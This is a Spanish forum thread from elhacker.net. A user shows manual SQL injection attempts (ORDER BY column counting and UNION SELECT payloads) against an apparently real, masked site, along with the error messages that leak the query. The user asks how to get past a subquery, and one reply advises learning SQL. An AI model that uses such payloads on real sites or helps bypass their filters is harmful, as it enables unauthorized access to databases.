Duda con slqi

Foro de elhacker.net

Foros Generales

Dudas Generales (Moderador: engel lex)

Duda con slqi

0 Usuarios y 1 Visitante están viendo este tema.

Páginas: [1]

Autor

Tema: Duda con slqi (Leído 1,868 veces)

b0771ch3l1

Desconectado

Mensajes: 2

Duda con slqi

« en: 15 Abril 2014, 14:20 pm »

Saludos a todos,

Necesito una idea para comprender lo que está pasando en este caso de inyección sql.

1 - Buscando el número de columnas:

dominio.com/cat/1/1 order by 10--

Código

UNKNOWN COLUMN '10' IN 'order clause'
 
SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name FROM wb_forum_parent_categories pc INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) WHERE c.id = 1 ORDER BY 10-- LIMIT 1

Al poner order by 2, se muestra la página normal. (2 columnas)

2 - Buscando columna/s visible/s:

dominio.com/cat/1/1 union select 1,2--

Código

Error NUMBER: 1222
 
The used SELECT statements have a different NUMBER OF COLUMNS
 
SELECT p.*, 0 AS read_id, m.member_name AS username, (SELECT m2.member_name AS last_post_username FROM wb_forum_posts p2 LEFT JOIN smf_members m2 ON (m2.id_member = p2.user_id) WHERE p2.deleted = 0 AND p2.relation_id = p.id ORDER BY p2.created DESC LIMIT 1) AS last_post_username, (SELECT p2.created AS last_post_date FROM wb_forum_posts p2 WHERE p2.deleted = 0 AND p2.relation_id = p.id ORDER BY p2.created DESC LIMIT 1) AS last_post_date FROM wb_forum_posts p LEFT JOIN smf_members m ON (m.id_member = p.user_id) WHERE p.deleted = 0 AND p.cat_id = 1 UNION SELECT 1,2-- AND p.post_id = 0 GROUP BY p.id ORDER BY p.priority DESC, p.created DESC

3 - Buscando manualmente otro número de columnas:

union select 1,2,3,4,5... hasta llegar a 18.

Código

Error NUMBER: 1222
 
The used SELECT statements have a different NUMBER OF COLUMNS
 
SELECT pc.cat_name AS parent_cat_name, c.cat_name AS cat_name FROM wb_forum_parent_categories pc INNER JOIN wb_forum_categories c ON (pc.id = c.parent_cat_id) WHERE c.id = 1 UNION SELECT 1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18-- LIMIT 1

¿Existe alguna forma de saltar esa sub-consulta?
Gracias.

PostData: No se pueden usar comillas ni comillas simples.


	En línea

Stakewinner00

Desconectado

Mensajes: 1.426

Re: Duda con slqi

« Respuesta #1 en: 15 Abril 2014, 18:21 pm »

Busca algún libro sobre SQL y aprende SQL, el SQLi es una técnica que sencillamente se basa en los errores mal procesados por la web que devuelven información y permite luego recuperar toda la base de datos. Actualmente este tipo de vulnerabilidad es de las más típicas y más peligrosas.


	En línea

b0771ch3l1

Desconectado

Mensajes: 2

Re: Duda con slqi

« Respuesta #2 en: 16 Abril 2014, 04:29 am »

Cita de: Stakewinner00 en 15 Abril 2014, 18:21 pm

Hola Stakewinner,

¡Fenomenal! Gracias por tu respuesta. Soy programador, sé SQL.

Hace tiempo aprendí y llevo practicando inyecciones sql. Basadas en error, en tiempo, blind boolean, etc

Con la configuración avanzada de sqlmap no conseguí saltar los filtros en algunos casos, al igual que el acunetix y havij. Sin embargo a mano lo conseguí, menos en este caso.

Si no sabes, mejor no contestes. La idea que necesito no es sobre la vida del lenguaje de consulta de datos. Es algo que precisamente en los libros no está.

De todas formas, gracias por contestar.
Saludos


	En línea

Páginas: [1]

Ir a:

Mensajes similares
	Asunto	Iniciado por	Respuestas	Vistas	Último mensaje
	Pequeña duda con un comando batch (NUEVA DUDA RELACIONADA) Scripting	revenge1252	9	9,752	13 Febrero 2008, 21:41 pm por revenge1252
	Duda duda y duda de Metasploit Bugs y Exploits	huber_nomas	4	5,785	17 Febrero 2012, 14:00 pm por MauroMasciar
	Duda facil, [VIDEO QUE EXPLICA MI DUDA] Diseño Gráfico	Ngeooz	6	8,866	2 Diciembre 2013, 19:33 pm por Ngeooz
	[DUDA] Cambiar letra de unidad a archivo con un Batch [DUDA] « 1 2 » Windows	MrMaticool	10	11,321	12 Febrero 2014, 17:55 pm por MrMaticool